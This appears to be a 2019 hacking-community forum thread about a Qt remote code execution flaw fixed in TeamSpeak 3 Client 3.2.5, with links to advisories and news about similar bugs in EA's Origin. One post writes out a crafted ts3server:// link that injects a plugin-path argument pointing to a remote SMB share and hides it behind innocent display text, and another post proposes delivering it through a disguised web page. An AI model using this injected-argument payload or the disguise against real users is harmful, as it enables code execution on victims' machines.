Remote Code Execution vulnerability in the Qt (Client < 3.2.5)

fyfywka · Apr 17, 2019

https://forum.teamspeak.com/threads/139546-Release-TeamSpeak-3-Client-3-2-5?p=468326#post468326

We have just released a very important security update for the TeamSpeak 3 Client addressing a Remote Code Execution vulnerability in the Qt framework. Please upgrade your desktop clients to version 3.2.5 immediately. The update is available for Windows, Linux and macOS. Mobile clients for Android and iOS are not affected by this issue.

Bluscream · Apr 17, 2019

Qt5-Based GUI Apps Susceptible to Remote Code Execution

Through a little known command line argument, applications that configure custom protocol handlers and are are developed using the Qt5 graphical user interface framework can be exposed to a remote code execution vulnerability.

www.bleepingcomputer.com

If it's that, you would need to trick the user to clicking something like [URL=ts3server://voice.teamspeak.com -platformpluginpath \\192.168.131.152\share]ts3server://voice.teamspeak.com[/URL]

fyfywka · Apr 17, 2019

https://www.bleepingcomputer.com/ne...ui-apps-susceptible-to-remote-code-execution/

FarisDev · Apr 18, 2019

Deleted member 97182 said:
Was it any guy from r4p3 that found this?

I don't think, because the vulnerability was From QT Not TeamSpeak. TeamSpeak is just an application uses QT.

Kieran · Apr 18, 2019

Very interesting. So basically you tell QT 'Ye, to load your DDLs pls look for them in "\\x.x.x.x\explt" when you start up thx'?
That means you can even put that on a website and kind of obfuscating the exploit in TS by putting the custom ts3server uri handler as a meta refresh on a page like this [url=mynotinnocenthomepage.com/puppies.html]mynotinnocenthomepage.com/puppies.html[/url], right?

InVaDeR359 · Apr 18, 2019

Kieran said:
Very interesting. So basically you tell QT 'Ye, to load your DDLs pls look for them in "\\x.x.x.x\explt" when you start up thx'?
That means you can even put that on a website and kind of obfuscating the exploit in TS by putting the custom ts3server uri handler as a meta refresh on a page like this [url=mynotinnocenthomepage.com/puppies.html]mynotinnocenthomepage.com/puppies.html[/url], right?

I think you mean [url=mynotinnocenthomepage.com/puppies.html]myinnocenthomepage.com/puppies.html[/url]

Kieran · Apr 18, 2019

InVaDeR359 said:
I think you mean [url=mynotinnocenthomepage.com/puppies.html]myinnocenthomepage.com/puppies.html[/url]

Also a possibility but that my spark suspicion, when someone copies the link instead of clicking right away when the displayed URL is different from the one that is linked

Harrasan · Apr 18, 2019

Deleted member 97182 said:
Was it any guy from r4p3 that found this?

If someone from the R4P3 community had found this, Asphyxia would probably have published a video on YouTube and put the exploit behind a paywall.

Asphyxia · Apr 18, 2019

Deleted member 97182 said:
Was it any guy from r4p3 that found this?

No, any software development frameworks offer a lot of extensibility to developers so they can work with and around the operating system. With frameworks being so powerful, they have the potential to be abused and ultimately misused for malicious purposes by hackers. This issue was found regarding QT, not specifically TeamSpeak but thankfully they (TeamSpeak developers) are staying on top of security patches - probably because we have made them rightfully paranoid which is a GOOD thing. We have done our job, now we are safer.

With that said, there may be more security issues with many frameworks like QT (TeamSpeak uses this framework for their software).

One example can be found here: https://securiteam.com/unixfocus/5NP0O2KDPI/ or http://scary.beasts.org/security/CESA-2004-004.txt

I believe something similar to this was used when we developed the avatar crasher: https://r4p3.net/threads/teamspeak-3-avatar-crash-client-3-0-0-3-0-17.335/

If we found a way to utilize this vulnerability, we would have released a PoC (Proof of Concept) demonstrating how one could use this for educational purposes.

People like @Harrasan think everything in life comes free and no one has to work for anything, he is actually really close to being banned because you can find him complaining about everything and thinking proficient security researchers need $0 to run expensive servers and study for $8,000 reverse engineering classes for becoming a malware analyst and incident responder for the FBI/NSA/etc.

Update: A PoC is over here https://www.thezdi.com/blog/2019/4/...ugs-detailing-cve-2019-1636-and-cve-2019-6739

Looks very simple... a security mistake that is small with big issues possible.

tagKnife · Apr 21, 2019

Origin got hit by the same exploit.

Security flaw in EA's Origin client exposed gamers to hackers | TechCrunch

Electronic Arts has fixed a vulnerability in its online gaming platform Origin after security researchers found they could trick an unsuspecting gamer

techcrunch.com

AMD also uses QT, but looks like they don't have a URI registered, at least not on my system.

Remote Code Execution vulnerability in the Qt (Client < 3.2.5)

fyfywka

Bluscream

Qt5-Based GUI Apps Susceptible to Remote Code Execution

fyfywka

FarisDev

L oryh brx

Kieran

Tag me

InVaDeR359

Active Member

Kieran

Tag me

Harrasan

Asphyxia

Owner

tagKnife

Well-Known Member

Security flaw in EA's Origin client exposed gamers to hackers | TechCrunch